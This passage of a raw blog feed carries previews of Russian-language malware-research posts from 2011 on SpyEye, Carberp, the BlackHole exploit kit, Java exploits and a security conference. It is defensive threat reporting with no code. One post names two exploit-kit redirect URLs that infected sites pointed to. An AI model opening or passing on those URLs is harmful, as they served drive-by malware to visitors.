Phenoelit&lt;/i&gt;&lt;br&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-9SIZT9CRyrg/Tt-j_YbfPmI/AAAAAAAABEA/C4k55BXLoVA/s1600/bhd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-9SIZT9CRyrg/Tt-j_YbfPmI/AAAAAAAABEA/C4k55BXLoVA/s320/bhd.png" width="212"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;В последнее время получается так, что книги именно этого издательства чаще всего попадают на мою книжную полку (The Tangled Web, Metasploit, IDA Pro Book). Собственно, чем же меня заинтересовала эта книга, ответ достаточно прост: я давно уже искал книгу для студентов.  Требования к книге  были довольно просты, она должна была бы разъяснять методы эксплуатации уязвимостей не на каких-то надуманных искусственных  примерах и при этом позволяла бы людям не искушенным в этом вопросе ознакомиться с предметной областью. A Bug Hunter’s Diary оказалась именно той книгой, что я искал в качестве дополнительной литературы и которую я мог бы рекомендовать моим студентам. Автор книги &lt;a href="http://www.trapkit.de/"&gt;Tobias Klein&lt;/a&gt;, выстроил ее таким образом, что она постепенно переходит к более сложным темам и  при этом рассматриваются уязвимости в реальных программных продуктах, которые известны многим и пользуются популярностью. Но сразу стоит сказать, что книга рассчитана на людей не искушённых с темой поиска уязвимостей и их эксплуатации, здесь вы не найдете новых методик обхода DEP/ASLR или руководство по использованию ROP.&lt;br&gt;&lt;br&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/12/bug-hunters-diary.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4101069074254839085?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4101069074254839085/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/12/bug-hunters-diary.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4101069074254839085'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4101069074254839085'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/12/bug-hunters-diary.html' title='Обзор книги «A Bug Hunter’s Diary»'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-9SIZT9CRyrg/Tt-j_YbfPmI/AAAAAAAABEA/C4k55BXLoVA/s72-c/bhd.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-419250655267502774</id><published>2011-12-06T12:38:00.001+04:00</published><updated>2011-12-06T12:55:15.241+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='SpyEye'/><title type='text'>Возвращение SpyEye</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;На прошлой неделе попался на глаза интересный сэмпл SpyEye. Собственно интересен он тем, что имеет целевые плагины для российских ДБО систем.&lt;br&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-XF5auqH-DOw/Tt3Urrg2shI/AAAAAAAABDg/b1xulK7PK2Y/s1600/spy1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-XF5auqH-DOw/Tt3Urrg2shI/AAAAAAAABDg/b1xulK7PK2Y/s1600/spy1.png"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/12/spyeye.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-419250655267502774?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/419250655267502774/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/12/spyeye.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/419250655267502774'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/419250655267502774'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/12/spyeye.html' title='Возвращение SpyEye'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-XF5auqH-DOw/Tt3Urrg2shI/AAAAAAAABDg/b1xulK7PK2Y/s72-c/spy1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-6863704622527549752</id><published>2011-12-05T15:42:00.001+04:00</published><updated>2011-12-06T12:11:22.105+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Carberp'/><category scheme='http://www.blogger.com/atom/ns#' term='Javascript'/><category scheme='http://www.blogger.com/atom/ns#' term='Java'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='BlackHole'/><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='SpyEye'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Carberp + BlackHole = рост ДБО инцидентов</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;В моем предыдущем сообщении я уже делал акцент на серьезном увлечении распространения троянской программы Carberp с легальных веб-сайтов, причем с довольно серьезной посещаемостью. В качестве эксплойтпака там всегда встречался BlackHole одной из последних версий. Например, в ноябре было замечено заражение таких ресурсов, как:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;ul&gt;&lt;li&gt;glavbukh.ru - скрытая переадресация на  jya56yhsvcsss.com/BVRQ (BlackHole)&lt;/li&gt;&lt;li&gt;ria.ru - скрытая переадресация на   aysh5tg2h3nk.com/BVRQ (BlackHole)&lt;/li&gt;&lt;/ul&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-mTq8rzyYgVM/Ttyx-v1o7oI/AAAAAAAABC4/DlTMrfToeAs/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="187" src="http://3.bp.blogspot.com/-mTq8rzyYgVM/Ttyx-v1o7oI/AAAAAAAABC4/DlTMrfToeAs/s320/5.jpg" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;У этих сайтов большой объем целевой аудитории людей, которые имеют доступ к управлению финансами в различных организациях и немаленький процент из этих людей подверглись атаки и последующему заражению троянцем Carberp, который прославился своей ДБО ориентированностью.&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;Подводя итоги ноября мы были просто шокированы количеством предотвращенных заражений этой вредоносной программой. Помимо того, что она вошла в пятерку самых распространенных угроз по нашему региону обратите внимание на рост обнаружении в  ноябре месяце:&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-di_oIUNNXyg/TtyxwpfwNUI/AAAAAAAABCw/6fTlTCeL7Zc/s1600/stat_carberp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="161" src="http://3.bp.blogspot.com/-di_oIUNNXyg/TtyxwpfwNUI/AAAAAAAABCw/6fTlTCeL7Zc/s320/stat_carberp.png" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/12/carberp-blackhole.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-6863704622527549752?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/6863704622527549752/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/12/carberp-blackhole.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6863704622527549752'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/6863704622527549752'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/12/carberp-blackhole.html' title='Carberp + BlackHole = рост ДБО инцидентов'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-mTq8rzyYgVM/Ttyx-v1o7oI/AAAAAAAABC4/DlTMrfToeAs/s72-c/5.jpg' height='72' width='72'/><thr:total>0</thr:total><georss:featurename>Братислава, Словакия</georss:featurename><georss:point>48.1462386 17.1072618</georss:point><georss:box>47.9767246 16.7914048 48.315752599999996 17.4231188</georss:box></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8062671874543161262</id><published>2011-11-30T16:46:00.001+04:00</published><updated>2011-12-05T18:29:00.841+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Carberp'/><category scheme='http://www.blogger.com/atom/ns#' term='Video'/><category scheme='http://www.blogger.com/atom/ns#' term='Java'/><category scheme='http://www.blogger.com/atom/ns#' term='Cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='BlackHole'/><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Java эксплойты впереди всех по пробиву</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;За последнее время Java-эксплойты получили наиболее широкое распространение в составе различных эксплойт-паков. Уровень пробива у них очень высок, так как обновляют JRE многие крайне редко, да и вообще забывают о его существовании. Для злоумышленников дополнительном стимолом к поиску уязвимостей в JRE является легкость их эксплуатации, стабильность, работа в обход различных песочниц внутри браузеров и кроссплатформенность.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-OfGd0wmNZr0/TtYsDGRoprI/AAAAAAAABCQ/cOeKjsdhjcQ/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="192" src="http://4.bp.blogspot.com/-OfGd0wmNZr0/TtYsDGRoprI/AAAAAAAABCQ/cOeKjsdhjcQ/s200/1.PNG" width="200"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/11/java.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8062671874543161262?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8062671874543161262/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/11/java.html#comment-form' title='Комментарии: 1'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8062671874543161262'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8062671874543161262'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/11/java.html' title='Java эксплойты впереди всех по пробиву'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-OfGd0wmNZr0/TtYsDGRoprI/AAAAAAAABCQ/cOeKjsdhjcQ/s72-c/1.PNG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-5688578604601655981</id><published>2011-11-28T22:44:00.001+04:00</published><updated>2011-11-29T00:59:53.341+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Carberp'/><category scheme='http://www.blogger.com/atom/ns#' term='ZeroNights'/><category scheme='http://www.blogger.com/atom/ns#' term='Duqu'/><category scheme='http://www.blogger.com/atom/ns#' term='Bootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='VBR'/><title type='text'>ZeroNights: глазами докладчика</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Наконец-то нашлось время для того, чтобы как то упорядочить свои впечатления от прошедшей на днях конференции &lt;a href="http://www.zeronights.ru/"&gt;ZeroNights&lt;/a&gt;. Организаторам совершенно однозначно удалось достичь высокого уровня докладов и актуальности рассмотренных тем. Так как в этом году мне довелось посетить большое количество зарубежных конференций со всей ответственностью, могу заявить, что ZeroNights был на уровне. Но с точки зрения организации были конечно моменты, которые я озвучу лично оргам и которые хотелось бы избежать в будущих мероприятиях. Мне большего всего не хватало атмосферы &amp;quot;хакерской конференции&amp;quot;, как это было на Ekoparty или Confidence.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Мое участие началось с доклада &amp;quot;Современные тенденции развития вредоносных программ для систем ДБО&amp;quot;, в котором было рассказано о последних тенденциях и эволюции в разработке банковских троянов, заточенных под Россию. Если охарактеризовать текущую ситуацию одним слайдом, то это будет выглядеть примерно так:&lt;br&gt;&lt;br&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-DHaqpSQ1TbQ/TtPbKwkXxAI/AAAAAAAABBY/cA4FxTX9lro/s1600/11242010.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="213" src="http://3.bp.blogspot.com/-DHaqpSQ1TbQ/TtPbKwkXxAI/AAAAAAAABBY/cA4FxTX9lro/s320/11242010.JPG" width="320"&gt;&lt;/a&gt;&lt;/div&gt;&lt;br&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/11/zeronights.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-5688578604601655981?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/5688578604601655981/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/11/zeronights.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5688578604601655981'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/5688578604601655981'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/11/zeronights.html' title='ZeroNights: глазами докладчика'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-DHaqpSQ1TbQ/TtPbKwkXxAI/AAAAAAAABBY/cA4FxTX9lro/s72-c/11242010.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-1359081156765007481</id><published>2011-11-23T21:19:00.001+04:00</published><updated>2011-11-23T21:37:32.835+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Carberp'/><category scheme='http://www.blogger.com/atom/ns#' term='ZeroNights'/><category scheme='http://www.blogger.com/atom/ns#' term='Duqu'/><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><title type='text'>ESET на ZeroNights</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-nS0rIajK7ZU/Ts0rNBo_ycI/AAAAAAAABBQ/Kb8nPzYfHuA/s1600/240_80.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-nS0rIajK7ZU/Ts0rNBo_ycI/AAAAAAAABBQ/Kb8nPzYfHuA/s1600/240_80.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Осталось всего несколько дней до основного мероприятия этой осени для исследователей в области ИБ. Мы, как компания с большим штатом ресечеров просто не могли пройти мимо и решили поддержать &lt;a href="http://www.zeronights.ru/"&gt;ZeroNights&lt;/a&gt; став основным &lt;a href="http://www.esetnod32.ru/.company/news/?id=78795&amp;amp;year=2010"&gt;спонсором&lt;/a&gt;&amp;nbsp;мероприятия. Для нашей компании это уже сложившаяся практика поддержки практических конференций. На нашем счету уже такие мероприятия, как PHD, Confidence, Ekoparty, REcon.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;В рамках программы мероприятия от нас будет два доклада:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Современные тенденции развития вредоносных программ для систем ДБО&lt;/li&gt;&lt;li&gt;Win32/Duqu: инволюция червя Stuxnet (FastTrack)&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;А еще всех участников конференции ждет новый увлекательный квест по реверсингу, с главным призом&amp;nbsp;Amazon Kindle DX. Подходите к нашему стенду, регистрируйтесь и&amp;nbsp;участвуйте!&amp;nbsp;Правила конкурса простые, кто первый сломал того и&amp;nbsp;Kindle =)&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-1359081156765007481?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/1359081156765007481/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/11/eset-zeronights.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1359081156765007481'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1359081156765007481'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/11/eset-zeronights.html' title='ESET на ZeroNights'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-nS0rIajK7ZU/Ts0rNBo_ycI/AAAAAAAABBQ/Kb8nPzYfHuA/s72-c/240_80.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-7384745547936769970</id><published>2011-11-22T14:22:00.001+04:00</published><updated>2011-11-22T19:16:53.224+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Carberp'/><category scheme='http://www.blogger.com/atom/ns#' term='ZeroNights'/><category scheme='http://www.blogger.com/atom/ns#' term='Bootkits'/><category scheme='http://www.blogger.com/atom/ns#' term='Rovnix'/><category scheme='http://www.blogger.com/atom/ns#' term='Cybercrime'/><category scheme='http://www.blogger.com/atom/ns#' term='VBR'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><title type='text'>Новая модификация Carberp использует буткит-функционал</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: justify;"&gt;Недавно &amp;nbsp;нам удалось обнаружить модификацию троянца Win32/Carberp, который в процессе заражения системы устанавливает буткит-функционал. Причем, после более детального анализа выяснилось, что буткит функциональность практически полностью копирует ранее известного буткита &lt;a href="http://amatrosov.blogspot.com/2011/09/defeating-x64-modern-trends-of-kernel.html"&gt;Rovnix&lt;/a&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-oW-leIozxq8/Tsu4avrA2YI/AAAAAAAABBI/sUzg1x8DrmI/s1600/bootkit_proof.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="278" src="http://1.bp.blogspot.com/-oW-leIozxq8/Tsu4avrA2YI/AAAAAAAABBI/sUzg1x8DrmI/s320/bootkit_proof.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Carberp, один из самых активных троянцев встречающихся в ДБО инцидентах в этом году. Мы провели небольшое расследование по этой теме помимо буткита, нашли еще много интересного.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Подробное исследование можно найти тут:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;a href="http://blog.eset.com/2011/11/21/evolution-of-win32carberp-going-deeper"&gt;Evolution of Win32Carberp: going deeper&lt;/a&gt; [EN]&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;a href="http://habrahabr.ru/company/eset/blog/133173/"&gt;Банковский троянец Carberp приобрел буткит-функционал&lt;/a&gt; [RU]&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;А, так же более расширенную версию нашего расследования можно будет&amp;nbsp;услышать&amp;nbsp;на &amp;nbsp;конференции &lt;a href="http://www.zeronights.ru/program"&gt;ZeroNights&lt;/a&gt; в ближайшую пятницу в рамках нашего доклада "Современные тенденции развития вредоносных программ для систем ДБО".&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-7384745547936769970?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/7384745547936769970/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/11/carberp.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7384745547936769970'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7384745547936769970'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/11/carberp.html' title='Новая модификация Carberp использует буткит-функционал'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-oW-leIozxq8/Tsu4avrA2YI/AAAAAAAABBI/sUzg1x8DrmI/s72-c/bootkit_proof.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-2373623994721825975</id><published>2011-11-14T21:50:00.001+04:00</published><updated>2011-11-14T21:51:39.288+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='Reflections'/><title type='text'>HA­CKER­PRAK­TI­KUM в Бохуме</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br&gt;&lt;div style="text-align: justify;"&gt;На прошлой неделе удалось побывать на интересном мероприятии HA­CKER­PRAK­TI­KUM, которое проводится уже на протяжении нескольких лет в университете &lt;a href="http://www.nds.rub.de/chair/news/"&gt;RUHR&lt;/a&gt; города Бохум. Нас, вместе с Евгением Родионовым, пригласили выступить с докладом, который мы уже демонстрировали на Ekoparty в этом году. Мероприятие HA­CKER­PRAK­TI­KUM, в рамках которого нам предложили выступить, проводится уже не первый год и призвано дать студентам практические знания от специалистов из различных областей в ИБ.&lt;/div&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-rbKFPMWqCPI/TsFBLQGvssI/AAAAAAAABAw/ppWKjssF4r8/s1600/11081990.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-rbKFPMWqCPI/TsFBLQGvssI/AAAAAAAABAw/ppWKjssF4r8/s320/11081990.JPG" width="213"&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a href="http://amatrosov.blogspot.com/2011/11/hackerpraktikum.html#more"&gt;Дальше »&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-2373623994721825975?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/2373623994721825975/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2011/11/hackerpraktikum.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2373623994721825975'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/2373623994721825975'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2011/11/hackerpraktikum.html' title='HA­CKER­PRAK­TI­KUM в Бохуме'/><author><name>Aleks 